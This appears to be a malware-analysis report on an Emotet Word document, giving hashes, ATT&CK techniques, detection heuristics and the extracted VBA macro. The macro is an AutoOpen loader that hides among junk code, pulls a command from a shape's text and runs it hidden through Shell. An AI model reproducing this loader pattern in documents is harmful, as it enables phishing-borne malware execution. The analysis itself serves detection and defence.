Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7b13baf547a06487…

MALICIOUS

Office (OLE)

Size: 75.5 KB
Created: 2018-11-16 06:41:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: b7496c788a6bc17aee3b57eb834cbe1a
SHA-1: 130a47fa20900726288c21a68dc1f31fe674ced8
SHA-256: 7b13baf547a06487858a4107f53b56161f4aac7a502e977df27223ec30cfce62
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader and is detected by ClamAV as Emotet. The AutoOpen macro is designed to execute obfuscated code that likely downloads and executes a second-stage payload. The presence of legacy WordBasic auto-exec markers further supports the malicious intent.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6872657-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6872657-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3411 bytes
SHA-256: 0408eddbc3d4dccd167d1064591f4525e1c5563eaed92e4a098d86154ecbcc98

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "bwiOniizVBh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    ' The repeated blocks below build a path from undeclared string fragments and
    ' probe it with Dir(); none of the resulting variables is used afterwards, so
    ' they only pad the macro around the real string source and execution sink.
    GZRGPjckc = "" + otXAwAiM + OKPqC + ActiveDocument.Name + zwZjG + CQtTi
    ORSUlWtfX = iMtHYi & BcTKSYC & "\" & GZRGPjckc
    If Dir(ORSUlWtfX) = "" Then
        If Dir(Replace(ORSUlWtfX, "IiINp", "ziAHWm")) <> "" Then
            ORSUlWtfX = Replace(ORSUlWtfX, "jjKCIKmQ", ".SJiwBh")
        End If
    End If
    ihUvahs = "" + jrBfItO + YbGlVsRbs + ActiveDocument.Name + XjLkUFN + ZMzBAsd
    sopMz = ZmvWYrOk & VCtUH & "\" & ihUvahs
    If Dir(sopMz) = "" Then
        If Dir(Replace(sopMz, "QssfHCJj", "rjXfak")) <> "" Then
            sopMz = Replace(sopMz, "PPYcRw", ".vRlUBwX")
        End If
    End If
    HmcYjM = "" + ZbuVZKmqu + WKDnz + ActiveDocument.Name + nQodN + awAQJ
    wNViIns = zcllkUBQR & VZbVdVq & "\" & HmcYjM
    If Dir(wNViIns) = "" Then
        If Dir(Replace(wNViIns, "rRwbobWl", "MjcFZZJ")) <> "" Then
            wNViIns = Replace(wNViIns, "nHpDtPl", ".AjYBw")
        End If
    End If
    KwOvo = "" + wlKQZpwtH + wSrctDLrl + ActiveDocument.Name + zWslC + IEqfIDM
    VovzXKJYw = wBAMhV & qBlRBGfbf & "\" & KwOvo
    If Dir(VovzXKJYw) = "" Then
        If Dir(Replace(VovzXKJYw, "KmnfOB", "ZVQRrLk")) <> "" Then
            VovzXKJYw = Replace(VovzXKJYw, "bzwKF", ".csZNvjrDb")
        End If
    End If
    ' String source: the command text is read from a shape's text frame inside the
    ' document, which keeps it out of the macro source itself.
    MiTcPhizNwJ = "" + DzdHu + QNZahLX + Shapes("mKuUMOR").TextFrame.ContainingRange + RbMITfz + Zouzki
    SolnGO = "" + zHwLGpqdi + TwBiCJfw + ActiveDocument.Name + AHYAiX + ilJVc
    zcfkwpFja = wHSIXLSHi & PoGNcD & "\" & SolnGO
    If Dir(zcfkwpFja) = "" Then
        If Dir(Replace(zcfkwpFja, "HIkSz", "tBbWQ")) <> "" Then
            zcfkwpFja = Replace(zcfkwpFja, "UlboJJfJ", ".joaHSnA")
        End If
    End If
    bCZwCbS = "" + jZtdY + IGlzGN + ActiveDocument.Name + FwGHiRU + NXnjXPk
    hhScujH = jVHAhYBbu & YqToDqcs & "\" & bCZwCbS
    If Dir(hhScujH) = "" Then
        If Dir(Replace(hhScujH, "VfRclziq", "qKGtJfobF")) <> "" Then
            hhScujH = Replace(hhScujH, "NbDXj", ".nWCGuAFX")
        End If
    End If
    ' Window style for the execution sink: vbHide runs the child process with no visible window.
    Const ioQhnoLktL = vbHide
    NDJqst = "" + VbTWkYP + jZjPMXC + ActiveDocument.Name + EtwqvvDC + PcTQsXVM
    TlaUKKiOs = lipcA & LdFOZlIU & "\" & NDJqst
    If Dir(TlaUKKiOs) = "" Then
        If Dir(Replace(TlaUKKiOs, "Vvjjrmf", "LzRmrl")) <> "" Then
            TlaUKKiOs = Replace(TlaUKKiOs, "VNtKL", ".ZXQiUvv")
        End If
    End If
    ' Execution sink: the string assembled from the shape text is passed to Shell.
    Shell@ MiTcPhizNwJ + KCqCG + BMKkjE, ioQhnoLktL
    ziaWlatf = "" + ABFHFKl + LqYZNW + ActiveDocument.Name + izfUz + SWFNGJqF
    SZcbEN = LbpwHLuC & mFDtmDkjW & "\" & ziaWlatf
    If Dir(SZcbEN) = "" Then
        If Dir(Replace(SZcbEN, "GRivYa", "wHHTdFJ")) <> "" Then
            SZcbEN = Replace(SZcbEN, "YHJzY", ".JQmihfzuz")
        End If
    End If
    YrOvi = "" + jZiVajPI + TYJQYpl + ActiveDocument.Name + ADFGmS + nDrHXHh
    iwWps = rkDUwGj & LBuvYSw & "\" & YrOvi
    If Dir(iwWps) = "" Then
        If Dir(Replace(iwWps, "cQqPO", "aJaKAMX")) <> "" Then
            iwWps = Replace(iwWps, "QnWnlBsAb", ".HChXpHkXl")
        End If
    End If
End Sub